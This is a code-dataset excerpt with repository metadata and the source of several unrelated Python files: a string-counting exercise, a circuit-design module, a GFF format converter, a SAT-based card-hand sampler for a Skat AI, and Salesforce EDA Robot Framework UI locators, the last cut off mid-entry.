#-----------------------------------------------------------------------------
600
13
76
42858455a9d8d1c85110f33472d486a90e93cd08
129
py
Python
answers/Utkarsh Srivastava/Day 11/Question 2.py
arc03/30-DaysOfCode-March-2021
6d6e11bf70280a578113f163352fa4fa8408baf6
[ "MIT" ]
22
2021-03-16T14:07:47.000Z
2021-08-13T08:52:50.000Z
answers/Utkarsh Srivastava/Day 11/Question 2.py
arc03/30-DaysOfCode-March-2021
6d6e11bf70280a578113f163352fa4fa8408baf6
[ "MIT" ]
174
2021-03-16T21:16:40.000Z
2021-06-12T05:19:51.000Z
answers/Utkarsh Srivastava/Day 11/Question 2.py
arc03/30-DaysOfCode-March-2021
6d6e11bf70280a578113f163352fa4fa8408baf6
[ "MIT" ]
135
2021-03-16T16:47:12.000Z
2021-06-27T14:22:38.000Z
s = input() c = 0 n = int(input()) a = [0]*3 c = 0 for i in range(n): a[i] = input() for i in (a): print(s.count(i))
12.9
25
0.465116
s = input() c = 0 n = int(input()) a = [0]*3 c = 0 for i in range(n): a[i] = input() for i in (a): print(s.count(i))
0
0
0
894d4c7667d1425ee76f58054c9c118df88cf99b
3,334
py
Python
bag_serdes_ec-master/BagModules/bag_serdes_ec/sense_amp_strongarm.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
null
null
null
bag_serdes_ec-master/BagModules/bag_serdes_ec/sense_amp_strongarm.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
null
null
null
bag_serdes_ec-master/BagModules/bag_serdes_ec/sense_amp_strongarm.py
tinapiao/Software-IC-Automation
74b23cd94aa6e4658b110e93b5deb635e014f3a6
[ "BSD-3-Clause" ]
1
2020-01-07T04:53:53.000Z
2020-01-07T04:53:53.000Z
# -*- coding: utf-8 -*- from typing import Dict, Any import os import pkg_resources from bag.design import Module yaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info', 'sense_amp_strongarm.yaml')) # noinspection PyPep8Naming class bag_serdes_ec__sense_amp_strongarm(Module): """Module for library bag_serdes_ec cell sense_amp_strongarm. Fill in high level description here. """ @classmethod @classmethod
37.460674
95
0.520996
# -*- coding: utf-8 -*- from typing import Dict, Any import os import pkg_resources from bag.design import Module yaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info', 'sense_amp_strongarm.yaml')) # noinspection PyPep8Naming class bag_serdes_ec__sense_amp_strongarm(Module): """Module for library bag_serdes_ec cell sense_amp_strongarm. Fill in high level description here. """ def __init__(self, bag_config, parent=None, prj=None, **kwargs): Module.__init__(self, bag_config, yaml_file, parent=parent, prj=prj, **kwargs) @classmethod def get_params_info(cls): # type: () -> Dict[str, str] return dict( lch='Channel length, in meters.', w_dict='width dictionary.', th_dict='threshold dictionary.', seg_dict='number of segments dictionary.', dum_info='Dummy information data structure.', export_probe='True to export probe pins.', ) @classmethod def get_default_param_values(cls): # type: () -> Dict[str, Any] return dict( dum_info=None, export_probe=False, ) def design(self, lch, w_dict, th_dict, seg_dict, dum_info, export_probe): if not export_probe: for name in ['midp', 'midn', 'qp', 'qn']: self.remove_pin(name) tran_info_list = [('XTAILL', 'tail'), ('XTAILR', 'tail'), ('XINL', 'in'), ('XINR', 'in'), ('XNINVL', 'ninv'), ('XNINVR', 'ninv'), ('XPINVL', 'pinv'), ('XPINVR', 'pinv'), ('XRML', 'pinv', 'rst'), ('XRMR', 'pinv', 'rst'), ('XRIL', 'pinv', 'rst'), ('XRIR', 'pinv', 'rst'), ] for inst_info in tran_info_list: w = w_dict[inst_info[1]] th = th_dict[inst_info[1]] if len(inst_info) < 3: seg = seg_dict[inst_info[1]] else: seg = seg_dict[inst_info[2]] self.instances[inst_info[0]].design(w=w, l=lch, nf=seg, intent=th) # design dummies self.design_dummy_transistors(dum_info, 'XDUM', 'VDD', 'VSS') # design NAND gates w_ninv = w_dict['ninv'] w_pinv = w_dict['pinv'] th_ninv = th_dict['ninv'] th_pinv = th_dict['pinv'] seg_nand = seg_dict['nand'] self.instances['XNANDL'].design(nin=2, lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_nand, segn=seg_nand) self.instances['XNANDR'].design(nin=2, lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_nand, segn=seg_nand) # design buffers seg_buf = seg_dict['buf'] self.instances['XINVL'].design(lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_buf, segn=seg_buf) self.instances['XINVR'].design(lch=lch, wp=w_pinv, wn=w_ninv, thp=th_pinv, thn=th_ninv, segp=seg_buf, segn=seg_buf)
2,698
0
106
771589f652cba1494d3ee1702e46549bfb1750de
261
py
Python
example/parse_space_to_tab.py
pflans/edge
d84de02bd9b334212b7405ecc4e68d3a209add99
[ "MIT" ]
32
2017-05-15T06:03:46.000Z
2022-02-18T08:30:19.000Z
example/parse_space_to_tab.py
pflans/edge
d84de02bd9b334212b7405ecc4e68d3a209add99
[ "MIT" ]
36
2017-05-11T01:29:14.000Z
2022-02-10T07:31:24.000Z
example/parse_space_to_tab.py
pflans/edge
d84de02bd9b334212b7405ecc4e68d3a209add99
[ "MIT" ]
4
2017-09-19T18:10:45.000Z
2019-11-29T03:38:08.000Z
# flake8: noqa # Converting GFF format with space in lines starting with gi to tab import sys import re fn = sys.argv[1] f = open(fn, "r") for l in f.read().split("\n"): if l.startswith("gi"): print re.sub(" ", "\t", l) else: print l
17.4
67
0.586207
# flake8: noqa # Converting GFF format with space in lines starting with gi to tab import sys import re fn = sys.argv[1] f = open(fn, "r") for l in f.read().split("\n"): if l.startswith("gi"): print re.sub(" ", "\t", l) else: print l
0
0
0
674346ea0686745d41b14badeff5ce6bb87c69bf
4,514
py
Python
sat_solver.py
mrolinek/alpha_skat
d045d5680829d9b70f710608d1a0dff2a43a89a2
[ "MIT" ]
null
null
null
sat_solver.py
mrolinek/alpha_skat
d045d5680829d9b70f710608d1a0dff2a43a89a2
[ "MIT" ]
null
null
null
sat_solver.py
mrolinek/alpha_skat
d045d5680829d9b70f710608d1a0dff2a43a89a2
[ "MIT" ]
null
null
null
import random from itertools import islice from pysat.solvers import Minicard import numpy as np # from numba import njit, int16 from utils import np_one_hot, softmax # @njit(int16[:,:](int16[:]))
37
100
0.696721
import random from itertools import islice from pysat.solvers import Minicard import numpy as np # from numba import njit, int16 from utils import np_one_hot, softmax def add_equal(solver, literals, k): solver.add_atmost(literals, k=k) solver.add_atmost([-lit for lit in literals], k=len(literals) - k) def add_basic_clauses(solver): for i in range(1, 33): add_equal(solver, [i, i+32, i+64, i+96], k=1) add_equal(solver, list(range(1, 33)), k=10) add_equal(solver, list(range(33, 65)), k=10) add_equal(solver, list(range(65, 97)), k=10) add_equal(solver, list(range(97, 129)), k=2) # @njit(int16[:,:](int16[:])) def sol_to_numpy(sol): np_sol = np.zeros(shape=32 * 4, dtype=np.int16) np_sol[[i - 1 for i in sol if i > 0]] = 1 return np_sol.reshape(4, 32) def solve_sat_for_init_hands(public_state_array, num_solutions): assert public_state_array.shape == (4, 32), public_state_array.shape solver = Minicard() add_basic_clauses(solver) positives = np.argwhere(public_state_array == 1) positive_literals = [int(1 + 32*i+j) for (i, j) in positives] negatives = np.argwhere(public_state_array == -1) negative_literals = [int(-(1 + 32 * i + j)) for (i, j) in negatives] solutions = solver.enum_models( assumptions=positive_literals+negative_literals) # High number to ensure sufficient randomness sols = list(islice(solutions, 2000)) if len(sols) > num_solutions: sols = random.sample(sols, num_solutions) result = [sol_to_numpy(sol) for sol in sols] return result def top_k_likely_hands(ruleset, current_state, k, policy_model, init_hands_to_sample, epsilon=1e-4): top_candidates = solve_sat_for_init_hands( current_state.implications, init_hands_to_sample) assert top_candidates num_sampled = len(top_candidates) init_states = [current_state.recover_init_state( initial_hands) for initial_hands in top_candidates] action_sequence = current_state.actions_taken all_states, all_actions, all_masks = [], [], [] actions_per_init_state = None for init_state in init_states: added_states = 0 state = init_state for action in action_sequence: available_actions = ruleset.available_actions(state) assert action in available_actions if state.active_player != current_state.active_player: all_states.append(state) all_actions.append(action) all_masks.append(available_actions) added_states += 1 state = ruleset.do_action(state, action) actions_per_init_state = actions_per_init_state or added_states # Every init hand has equal number of actions to evaluate assert actions_per_init_state == added_states actions_per_init_state = added_states if not all_states: if len(top_candidates) > k: top_candidates = random.sample(top_candidates, k) return top_candidates # Run NN nn_states = [state.state_for_player( state.active_player).state_for_nn[None, ...] for state in all_states] nn_states = np.concatenate(nn_states, axis=0) all_masks_numpy = np.concatenate( [np_one_hot(mask, 32)[None, ...] for mask in all_masks], axis=0) policy_logits = policy_model.get_policy(nn_states) assert policy_logits.shape == all_masks_numpy.shape # Collect probabilities of init_hands policy_probabilities = softmax(policy_logits + 1000*(all_masks_numpy - 1)) log_probabilities = np.log(policy_probabilities + epsilon) log_probs_of_taken_actions = log_probabilities[np.arange( len(all_actions)), np.array(all_actions)] log_probs_by_init_state = log_probs_of_taken_actions.reshape( (num_sampled, actions_per_init_state)) log_probs_by_init_state = np.sum(log_probs_by_init_state, axis=1) probabilities_of_init_hands = softmax(log_probs_by_init_state) sampled_indices = np.random.choice(np.arange(len(top_candidates)), size=k, replace=True, p=probabilities_of_init_hands) sampled_hands = [top_candidates[int(i)] for i in sampled_indices] # Compute and return top_k # top_k_init_state_indices = np.argsort(-log_probs_by_init_state)[:k] # top_k_init_hands = [top_candidates[i] for i in top_k_init_state_indices] # print("Guessed hands:") # for hand in sampled_hands: # print(hand) return sampled_hands
4,195
0
114
da76f995d11bd28ae523a0312bda5e882e405910
18
py
Python
vapetool/__init__.py
vape-tool/VapeTool-BatteriesParser
54281efd489152367d1270b385c5dbef355bb4f3
[ "MIT" ]
null
null
null
vapetool/__init__.py
vape-tool/VapeTool-BatteriesParser
54281efd489152367d1270b385c5dbef355bb4f3
[ "MIT" ]
null
null
null
vapetool/__init__.py
vape-tool/VapeTool-BatteriesParser
54281efd489152367d1270b385c5dbef355bb4f3
[ "MIT" ]
null
null
null
name = "vapetool"
9
17
0.666667
name = "vapetool"
0
0
0
d79c076c8011693447d6fb2aef7d47c679a26d5d
95
py
Python
pdd_sdk/api/__init__.py
ymj4023/pdd_sdk
a8ab114542e5f450b7ea32fb3c0564dfbb2f4e36
[ "MIT" ]
1
2020-07-07T06:47:15.000Z
2020-07-07T06:47:15.000Z
pdd_sdk/api/__init__.py
ymj4023/pdd_sdk
a8ab114542e5f450b7ea32fb3c0564dfbb2f4e36
[ "MIT" ]
null
null
null
pdd_sdk/api/__init__.py
ymj4023/pdd_sdk
a8ab114542e5f450b7ea32fb3c0564dfbb2f4e36
[ "MIT" ]
null
null
null
""" __init__.py.py: """ from pdd_sdk.api.rest import * from pdd_sdk.api.base import FileItem
11.875
37
0.715789
""" __init__.py.py: """ from pdd_sdk.api.rest import * from pdd_sdk.api.base import FileItem
0
0
0
55c34f1cedaab14c52d32e5d7def43998f4cfbac
51,214
py
Python
robot/EDA/resources/locators_54.py
eclemmer/EDA
3a6d2b86acfdca47c450a34ba9bd7a73cd299b62
[ "BSD-3-Clause" ]
null
null
null
robot/EDA/resources/locators_54.py
eclemmer/EDA
3a6d2b86acfdca47c450a34ba9bd7a73cd299b62
[ "BSD-3-Clause" ]
null
null
null
robot/EDA/resources/locators_54.py
eclemmer/EDA
3a6d2b86acfdca47c450a34ba9bd7a73cd299b62
[ "BSD-3-Clause" ]
1
2022-02-25T18:23:49.000Z
2022-02-25T18:23:49.000Z
""" Locators for Spring '22 """ eda_lex_locators = { "app_tile": "//one-app-launcher-modal//one-app-launcher-app-tile//a[.='{}']", "app_item": "//a[@data-label='{}']", "frame": "//iframe[contains(@id, '{}') or contains(@title, '{}') or contains(@name, '{}')]", "input_placeholder": "//input[contains(@placeholder,'{}')]", "panel_tab_lookup": "//a/span[text()='{}']", "toast_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "success_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "toast_close": "//div[@id='successToast']/descendant::button[contains(@class, 'slds-notify__close')]", "close_tab": "//*[@data-key='close']/ancestor::button[contains(@class, 'slds-button slds-button_icon-x-small')]", "mailing_address": "//*[contains(@placeholder,'{}')]", "record": { "actions": "//div[contains(@class, 'actionsContainer')]/descendant::a[@title='{}']", "button": "//div[@class='actionsContainer']/button[@title='{}']", "datepicker": "//div[contains(@class,'uiDatePickerGrid')]/table[@class='calGrid']//span[text()='{}']", "edit_button": '//*[@title="{}"]', "list": "//div[contains(@class,'forcePageBlockItem')]//div//div//div//span//span[contains(text(), 'Primary Address Type')]/../../div/div/div/div/a[@class='select']", "related": { "new": "//div[@class='container']/descendant::div[contains(@class, 'slds-card__header')]/header/descendant::span[text()='{}']/ancestor::header/following-sibling::div/descendant::a[@title='New']", "title": "//span[@title='{}']", }, }, "tabs": { "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "spl-tab": "//div[@class='slds-tabs_default']//ul[@class='slds-tabs_default__nav']/li[contains(@class,'slds-tabs_default__item')]/a[text()= '{}']", }, "eda_setup": { "custom_settings": "//a[text()='{}']", "settings_action_button": "//input[@type='submit' and @value='{}']", "setup_owner": "//table[@class='list']/descendant::td", }, "eda_settings": { "action": "//div[@role='banner']/descendant::button[contains(@class, 'settings-{}-bttn')]", "edit": "//div[@class='slds-page-header' and @role='banner']/descendant::span[text()='Edit']/parent::button", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "checkbox_default": "//span[text()='{}']/../following-sibling::div/descendant::img", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "system_tab": "//a[contains(text(),'System')]", "affiliations_tab": "//a[contains(text(),'Affiliations')]", "affiliations_check": "//span[text()='Specify Role for Created Affiliations']/../following-sibling::div/div/div/label/span/img[@class = 'copy-start-date checked' and @alt='True']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_sports_organization": "//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "primary_affl_unchecked": "//div/span[text()='{}']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "checkbox_ap_affl": "(//label[@class='slds-checkbox']/input[@class='mapping-auto-enroll uiInput uiInputCheckbox uiInput--default uiInput--checkbox'])[1]/following-sibling::span[@class='slds-checkbox--faux']", "primary_affl_edit": "(//label/span[text()='Primary Affl Field: {}']/../../../following-sibling::div/div/div/label)[1]/input/following-sibling::span[@class='slds-checkbox--faux']", "affiliations_role_checkbox": "//input[@class='copy-start-date uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "affiliation_mappings_tab": "//a[contains(text(), 'Affiliation Mappings')]", "courses": "//a[contains(text(),'Courses')]", "duration": "//div[.//span[text()='Duration'] and contains(@class, 'slds-form-element') ]//select//option[@value='60']", "hh_naming_check": "//input[@class='automatic-hh-acc uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "hh_naming_role_checkbox": "//select[@class='admin-account-naming-input-select select uiInput uiInputSelect uiInput--default uiInput--select']//option[@value='{{!{{!FirstName}}}} {{!LastName}} Administrative Account']", "hh_adminfnamelname": "//input[contains(@class,'firstName')]", "course_connections_tab": "//a[contains(text(),'Course Connections')]", "cc_checkbox": "//input[contains(@class,'slds-checkbox')]/parent::label", "student_select": "//select[contains(@class,'student-course-connection-record-type-input-select')]", "faculty_select": "//select[contains(@class,'faculty-course-connection-record-type-input-select')]", "status_student_affl": "//select[contains(@class,'affiliation-role-picklist-input-select')]", "status_spec_affl_not_deleted_former": "//select[contains(@class,'affiliation-status-delete-picklist-input-select')]", "status_current_picklist_affl": "//select[contains(@class,'affiliation-status-picklist-input-select')]", "default_account_model": "//span[text()='Default Account Model']", "store_errors": "//span[text()='Store Errors']", "send_error_notifications": "//span[text()='Send Error Notifications']", "error_notification_recipients": "//span[text()='Error Notification Recipients']", "disable_error_handling": "//span[text()='Disable Error Handling']", "automatic_household_naming": "//span[text()='Automatic Household Naming']", "adminstrative_account_name_format": "//span[text()='Administrative Account Name Format']", "household_account_name_format": "//span[text()='Household Account Name Format']", "batch_processing": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td[text()='Processing'])[1]", "just_batch": "(//td/following-sibling::td[text()='Batch Apex'])[1]", "batch_watch": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "wait_frame": "//iframe[contains(@title,'Apex Jobs ~ Salesforce - Developer Edition')]", "wait_loc_text": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "new_account": "//span[@title='New Account']", "affiliated_accounts": "//span[@title='Affiliated Accounts']", "affiliation_match": "//th[@data-label='Affiliation Key']/../descendant::a[@title='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "administrative_account": "//div/a[text()='{} Administrative Account']", "contact_edit": "//a[@title='Edit']", "en_re_type_validation": "(//div/span[text()='Record Type Validation']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "ert_validation": "//span/img[@class='affl-record-type-enforced checked' and @alt='True']", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "delete_rec_affl": "//span/img[@class='delete-prog-enroll checked' and @alt='True']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "del_rel_affl": "(//div/span[text()='Delete Related Affiliation When Deleting Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "specify_r_checkbox": "(//div/span[text()='Specify Role for Created Affiliations']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "un_copy_affl_end_date": "//span/img[@class='copy-end-date unchecked' and @alt='False']", "copy_affliation_end_checkbox": "(//div/span[text()='Copy Affiliation End Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "copy_affliation_start_checkbox": "(//div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "settings_tab": "(//li[@class='slds-tabs__item slds-text-heading--label slds-active' and @role='tab' and @title='Settings'])[1]/a[contains(text(),'Settings')]", "affl_mappings_tab": "//a[contains(text(),'Affiliation Mappings')]", "default_checkbox": "//div[text()='{}']/following-sibling::div/descendant::img", "enable_checkbox": "(//div[text()='{}']/following-sibling::div/descendant::span)[1]", "dropdown_field": "//div[text()='{}']/following-sibling::div/select", "action_button": "//button[text()='{}']", "update_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "add_setting_button": "//span[text()='{}']/../following-sibling::button/span[text()='{}']", }, "eda_settings_new": { "global_action": "//button[text()='{}']", "edc_header": "//h2[contains(@class, 'header')]/descendant::span[text()='{}']", "toast_message": "//div[contains(@class, 'slds-theme--success slds-notify--toast slds-notify slds-notify--toast forceToastMessage')]/descendant::span[text()='{}']", "custom_toast": "//div[contains(@class, 'forceToastMessage')]/descendant::span[contains(@class, 'toastMessage')]", "settings_nav_title": "//div[@data-qa-locator='edaSettingsNavigation']/descendant::a[text()='{}']", "dropdown_input": "//label[text()='{}']/../descendant::button[contains(@class, 'slds-combobox__input')]", "settings_dropdown": "//label[text()='{}']/../descendant::span[text()='{}']", "select_from_list": "//div[text()='{}']/../following-sibling::div/descendant::div[contains(@class, 'list__options')]/descendant::span[text()='{}']", "move_to_selected": "//div[text()='{}']/../following-sibling::div/descendant::button[@type='button' and @title='Move selection to Selected Account Record Types']", "tell_me_more": "//div[text()='{}']/../descendant::a[text()='{}']", "toggle_status": "//span[text()='{}']/../ancestor::lightning-input", "toggle_input": "//span[text()='{}']/../descendant::span[contains(@id, 'toggle')]", "update_button": "//div[text()='{}']/../parent::div/descendant::button[text()='{}']", "footer_button": "//div[contains(@class, 'footer')]/descendant::button[@title='{}']", "app_tile": "//h2[text()='{}']/../descendant::ul/descendant::*[self::div or self::span][text()='{}']", "show_actions_button": "//tr[@data-row-key-value='{}']/descendant::span[text()='Show actions']/ancestor::button[@type='button']", "actions_menu": "//tr[@data-row-key-value='{}']/descendant::span[text()='{}']/ancestor::a[@role='menuitem']", }, "eda_settings_cc": { "default_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div/descendant::img", "dropdown_values": "//div[text()='{}']/following-sibling::div/select/option[text()='{}']", "dropdown_values_count": "//div[text()='{}']/following-sibling::div/select/option", "enable_cc_checkbox": "//div[text()='Enable Course Connections']/following-sibling::div[1]/descendant::span", "enable_cc_warning_enabled": "//div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "enable_cc_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::div[contains(@class, 'slds-notify') and @role='alert']/descendant::*[@data-key='warning']/../../following-sibling::span[text()='You must enable Course Connections before editing record types.']", "updated_dropdown_value": "//div[text()='{}']/following-sibling::div/descendant::span[text()='{}']", "settings_tab": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='Settings']", "backfill_warning_enabled": "//div[contains(@class, 'slds-notify--alert')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "backfill_warning_disabled": "//span[contains(@class, 'slds-hide')]/descendant::span[text()='You must enable Course Connections before running the Course Connections Backfill.']", "cc_sub_tabs": "//div[contains(@class, 'CourseConnections')]/descendant::a[text()='{}']", "backfill_button_status": "//span[text()='{}']/parent::button", "backfill_checkbox_status": "//input[contains(@class, 'backfill')]/following-sibling::span[contains(@class, 'checkbox')]", "backfill_checkbox": "//span[text()='I understand and am ready to run Backfill.']/../span[contains(@class, 'checkbox')]", "backfill_toast": "//div[@id='backFillToast']/descendant::span[text()='{}']", }, "eda_settings_program_plans": { "checkbox_read": "(//span[text()='{}']/../following-sibling::div/descendant::img)[1]", "checkbox_edit": "(//span[text()='{}']/../following-sibling::div/descendant::span)[1]", "updated_checkbox_edit": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", }, "eda_settings_affiliations": { "acc_rec_type_edit": "//span[text()='Acc Record Type: {}']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", "acc_rec_type_cleared": "//span[text()='Acc Record Type: ']/../following-sibling::input[contains(@class, 'mapping-acc-rec-type')]", }, "eda_settings_courses": { "text_message": "//span[text()='{}']", }, "eda_settings_accounts_contacts": { "checkbox": "//span[text()='{}']/following::div[1]/descendant::span[text()='{}']/parent::label/span[contains(@class, 'checkbox')]", "checkbox_value": "//span[text()='{}']/following::label[1][contains(@class, 'checkbox')]/span[contains(@class, 'checkbox')]", "checkbox_list": "//span[text()='{}']/../../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "checkbox_list_read": "//span[text()='{}']/../../following-sibling::div[1]/descendant::img", "dropdown_acc": "//span[text()='{}']/../following-sibling::div[1]/select/option[text()='{}']", }, "eda_settings_relationships": { "dropdown_read": "//span[text()='{}']/../following-sibling::div[1]/descendant::span", "dropdown_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[text()='{}']", "new_reciprocal_setting": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']/following::input[1]", "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "active_checkbox": "//span[text()='{}']/following::input[contains(@class, 'new-rec-sett')]/../span[contains(@class, 'checkbox')]", "add_setting_button": "//div[contains(@class, 'newrecsetting')]/descendant::span[text()='{}']", "settings_count": "//span[contains(@class, 'Checkbox')]/img[contains(@class, 'rec-settg')]", "new_settings": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'rec-settg-{}') and text()='{}']", "new_setting_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'rec-settg-{}')]/../label/span[text()='{}: {}']", "new_setting_checkbox": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::img[contains(@class, 'rec-settg-{}')]", "new_setting_checkbox_edit": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-1]/descendant::input[contains(@class, 'rec-settg-{}')]/../span[contains(@class, 'checkbox')]", "delete_setting_icon": "//span[text()='{}: {}']/following::lightning-icon[1][contains(@class, 'delete')]", "removed_setting": "//span[contains(@class, 'rec-settg-{}') and text()='{}']", "removed_autoc_setting": "//span[contains(@class, 'autoc-settg-{}') and text()='{}']", "updtate_setting_name": "//span[text()='Name: {}']/../following-sibling::input[contains(@class, 'rec-settg-{}')]", "update_setting_name_cleared": "//span[text()='Name: ']/../following-sibling::input[contains(@class, 'rec-settg-name')]", "update_setting_rest": "(//span[text()='Name: {}']/following::input[contains(@class, 'rec-settg-{}')])[1]", "updated_setting": "//span[contains(@class, 'rec-settg-name') and text()='{}']/following::div/span[contains(@class, 'rec-settg-{}') and text()='{}']", "test_locator": "(//div[@class='newrecsetting']/preceding-sibling::div[1]/div)[last()-2]/descendant::input[contains(@class, 'rec-settg-neutral')]", "new_autocreate_setting": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::input[1]", "campaign_type_textarea": "//div[contains(@class, 'newautocsetting')]/descendant::span[text()='{}']/following::textarea", "new_settings_autoc": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/span[contains(@class, 'autoc-settg-{}') and text()='{}']", "new_autoc_setting_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::input[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", "new_campaign_types_edit": "(//div[@class='newautocsetting']/preceding-sibling::div[1]/div)[last()-{}]/descendant::textarea[contains(@class, 'autoc-settg-{}')]/../label/span[text()='{}: {}']", }, "eda_settings_system": { "default_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::img", "default_dropdown_value": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[text()='{}']", "admin_success_toast": "//div[@id='adminSuccessToast']/descendant::h2", "hh_success_toast": "//div[@id='hhSuccessToast']/descendant::h2", "other_accname_format": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::input", "other_dropdown_value": "//span[text()='{}']/../preceding-sibling::div[1]/descendant::span[text()='{}']", "recipient_type_value": "//span[text()='{}']/../following-sibling::div/descendant::select/option[@value='{}']", "recipient_name": "//label[text()='{}']/../div/descendant::input", "recipient_lookup": "//div[contains(@class, 'lookup') and text()='{}']", }, "account_types": { "administrative": "//span[contains(text(),'Administrative')]/parent::*", "household": "//span[text()='Household Account']/preceding-sibling::span", "account_checkbox": "//div[contains(@class,'slds-form-element__control')]//span[contains(text(),'{}')]", "save": "//button[contains(@class, 'slds-button')]/span[text()='Save']/..", "edit": "//button[contains(@class, 'slds-button')]/span[text()='Edit']/..", "cancel": "//button[contains(@class, 'slds-button')]/span[text()='Cancel']/..", }, "contact": { "new_button": "//a[@title='New']//div[@title='New']", "first_name": "//input[contains(@class,'firstName')]", "last_name": "//input[contains(@class,'lastName')]", "save_button": "//button[@title='Save']", "program_enrollment_new_button": "//div[contains(@class, 'windowViewMode-normal')]//span[text()='Program Enrollments']/following-sibling::span[@title='(0)']/ancestor::header/following-sibling::div/descendant::a[@title='New']", }, "program_plans": { "program_plan": "(//a[@title='Program Plans'])[2]/span/span", "new_button": "//a[@title='New']//div[@title='New']/..", "pp_name": "//div//div//div//div//div//div//div//label//span[contains(text(), 'Program Plan Name')]//../following-sibling::input", "save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", }, "plan_requirement": { "error": "//div[contains(@class, 'pageLevelErrors')]/descendant::li[text()='{}']", "parent_plan_req_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Parent Plan Requirement']/../following-sibling::div/descendant::span[text()='{}']", "plan_requirement_name": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Plan Requirement Name']/../following-sibling::input", "program_plan_name": "//td/a[@title='{}']", "program_plan": "//div[contains(@class, 'slds-modal__container')]/descendant::span[text()='Program Plan']/../following-sibling::div/descendant::span[text()='{}']", "delete_field": "//div[contains(@class, 